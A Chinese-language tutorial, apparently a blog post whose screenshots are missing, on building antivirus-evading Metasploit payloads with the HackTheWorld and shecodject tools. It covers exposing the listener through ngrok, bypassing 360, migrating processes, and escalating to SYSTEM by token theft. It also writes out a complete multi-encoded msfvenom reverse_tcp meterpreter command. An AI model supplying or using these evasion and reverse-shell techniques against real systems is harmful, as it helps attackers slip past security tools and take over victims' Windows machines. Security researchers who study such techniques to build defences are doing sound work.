1、HackTheWorld
Git:https://github.com/stormshadow07/HackTheWorld
安裝環境python2,相關依賴環境。
生成一個msf免殺payload:
首先設置payload類型:
其中LHOST可以使用ngrok內網映射工具,將本地kali反射到公網。
LPORT是通過ngrok進行反射時分配的端口。
實驗過程中TCP類型的Payload被360查殺,https類型未被查殺。
之後就是輸入密鑰等等。
開啓msf的監聽模塊:
運行程序之後,未觸發360,成功獲取session:
原進程在火絨劍中屬於異常進程,獲取session之後首先進行進程遷移:
遷移到notepad進程。
權限提升:
通過令牌竊取提升權限:
首先是低權用戶,直接getsystem失敗:
導入incognito模塊:
列出可用令牌:
竊取system令牌:
注意添加雙引號和兩個反斜槓
成功獲取SYSTEM權限:
第二款工具:shecodject
Git地址:https://github.com/TaroballzChen/shecodject
安裝環境說明:2020版kali安裝過程使用root權限安裝,工具通過docker進行打包,會使用到docker鏡像,安裝完成之後最好將docker源換成國內源。
1、通過mpr方式生成免殺shellcode
執行run命令,會生成shellcode的臨時文件:
之後back回到系統命令,然後輸入exe對之前生成的臨時文件進行打包:
此處設置noconsole的值會影響360的查殺,有控制檯是360不能查殺,無console時會被查殺。
之後run既可以。
Noconsole被查殺
存在concole的沒有被查殺:
並且成功獲取session
2、
首先生成pem證書:
合併rsaprivate.key和servercertifcate.crt爲pem文件:
使用msfvenom生成原始的shellcode:
這裏使用多次編碼生成原始文件:
命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.135.139 Lport=4444 --platform windows -a x86 HandlerSSLCert=./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > ./shellcode.raw
利用shecodject進行免殺:
使用scc模塊,將raw生成tmp文件:
然後利用exe模塊進行打包:
有console的狀態免殺:
測試無console,免殺: